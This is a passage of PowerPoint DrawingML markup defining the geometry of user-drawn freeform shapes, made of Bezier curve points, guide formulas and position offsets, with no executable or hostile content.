                  <a:gd name="T92" fmla="*/ 73 w 179"/>
                  <a:gd name="T93" fmla="*/ 48 h 209"/>
                  <a:gd name="T94" fmla="*/ 65 w 179"/>
                  <a:gd name="T95" fmla="*/ 60 h 209"/>
                  <a:gd name="T96" fmla="*/ 101 w 179"/>
                  <a:gd name="T97" fmla="*/ 59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9"/>
                      <a:pt x="134" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="128" y="209"/>
                      <a:pt x="125" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="208"/>
                      <a:pt x="119" y="206"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="110" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="199"/>
                      <a:pt x="81" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="199"/>
                      <a:pt x="72" y="200"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="209"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="48" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="38" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="198"/>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10" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="159"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="163"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="170"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="187"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="7" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="194"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="197"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="204"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="198"/>
                      <a:pt x="65" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="27" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="141"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="133"/>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32" y="119"/>
                      <a:pt x="35" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="91"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="77"/>
                      <a:pt x="58" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="71"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="59" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="39"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="17"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="1"/>
                      <a:pt x="81" y="1"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="102" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="12"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="62"/>
                      <a:pt x="128" y="75"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="134"/>
                      <a:pt x="161" y="139"/>
                      <a:pt x="160" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160"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50"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="125" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="121" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="156"/>
                      <a:pt x="120" y="160"/>
                      <a:pt x="121" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="179"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="144" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="186"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="183"/>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="174"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="172"/>
                      <a:pt x="161" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="161"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="72"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="74"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="69"/>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4" y="72"/>
                      <a:pt x="91" y="75"/>
                      <a:pt x="87" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="83"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="73" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="63" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="99"/>
                      <a:pt x="57" y="100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="52" y="109"/>
                      <a:pt x="50" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="142"/>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="141"/>
                      <a:pt x="41" y="140"/>
                      <a:pt x="40" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="38" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="124"/>
                      <a:pt x="38" y="123"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                      <a:pt x="37"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70" y="170"/>
                      <a:pt x="69" y="173"/>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8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="196"/>
                      <a:pt x="73" y="194"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="189"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="68" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="182"/>
                      <a:pt x="71" y="182"/>
                      <a:pt x="72" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="76" y="186"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="188"/>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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="168"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="157"/>
                      <a:pt x="118" y="154"/>
                      <a:pt x="119" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="143"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="139"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135" y="98"/>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5"/>
                      <a:pt x="124" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="87"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107"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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="52"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="100" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="88" y="34"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="41"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="44"/>
                      <a:pt x="87" y="46"/>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7" y="33"/>
                      <a:pt x="66" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="51"/>
                      <a:pt x="67" y="52"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="49"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="40"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="48"/>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7"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97"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6"/>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231"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5762" y="3343"/>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232"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5774" y="3343"/>
                <a:ext cx="5" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 3 w 4"/>
                  <a:gd name="T3" fmla="*/ 0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1"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="4" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="2"/>
                      <a:pt x="3" y="2"/>
                      <a:pt x="2"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233"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1951"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234"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2149"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235"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2299"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Freeform 236"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2446"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Freeform 237"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2643"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Freeform 238"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2792"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239"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2990" y="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240"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140"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241"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3288"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Freeform 242"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="343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243"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3632"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Freeform 244"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="382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245"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4228"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Freeform 246"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4425"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247"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4575"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Freeform 248"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723"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249"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4920"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8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4"/>
                      <a:pt x="0" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="31"/>
                      <a:pt x="11" y="29"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="24"/>
                      <a:pt x="27" y="21"/>
                      <a:pt x="32" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="16"/>
                      <a:pt x="43" y="13"/>
                      <a:pt x="48"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Freeform 250"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5070"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251"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="521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Freeform 252"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5414"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Freeform 253"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="560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Freeform 254"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5806"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255"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5943" y="13"/>
                <a:ext cx="188" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 188"/>
                  <a:gd name="T1" fmla="*/ 68 h 219"/>
                  <a:gd name="T2" fmla="*/ 185 w 188"/>
                  <a:gd name="T3" fmla="*/ 85 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 188"/>
                  <a:gd name="T5" fmla="*/ 85 h 219"/>
                  <a:gd name="T6" fmla="*/ 130 w 188"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 177 w 188"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 173 w 188"/>
                  <a:gd name="T11" fmla="*/ 153 h 219"/>
                  <a:gd name="T12" fmla="*/ 126 w 188"/>
                  <a:gd name="T13" fmla="*/ 153 h 219"/>
                  <a:gd name="T14" fmla="*/ 112 w 188"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 91 w 188"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 106 w 188"/>
                  <a:gd name="T19" fmla="*/ 153 h 219"/>
                  <a:gd name="T20" fmla="*/ 64 w 188"/>
                  <a:gd name="T21" fmla="*/ 153 h 219"/>
                  <a:gd name="T22" fmla="*/ 49 w 188"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 29 w 188"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 43 w 188"/>
                  <a:gd name="T27" fmla="*/ 153 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 188"/>
                  <a:gd name="T29" fmla="*/ 153 h 219"/>
                  <a:gd name="T30" fmla="*/ 3 w 188"/>
